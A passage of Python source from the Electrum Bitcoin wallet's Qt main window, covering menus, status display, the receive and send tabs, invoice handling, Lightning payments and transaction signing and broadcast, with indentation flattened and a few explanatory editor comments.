raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
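# Worked example of the conversion above (editor's addition, illustrative rate):
# with rate = 50000 and a fiat entry of 25, btc_e is set to
# int(25 / 50000 * COIN) = 50000 satoshis (0.0005 BTC).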
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
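# Column roles in this grid (editor's note, derived from the comment above):
#   col 0: field label | col 1: input widget | col 2: fiat amount (exchange rate plugin) | col 3: stretch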
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
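# e.g. an invoice starting with "lnbc1..." is passed to the QR widget as "LNBC1..." (editor's note)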
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
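        # '!' is the spend-max sentinel; pass it through so the confirm dialog computes the maximum itself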
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
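        # let plugins wrap the success callback (used by the TrustedCoin 2FA signing flow)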
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
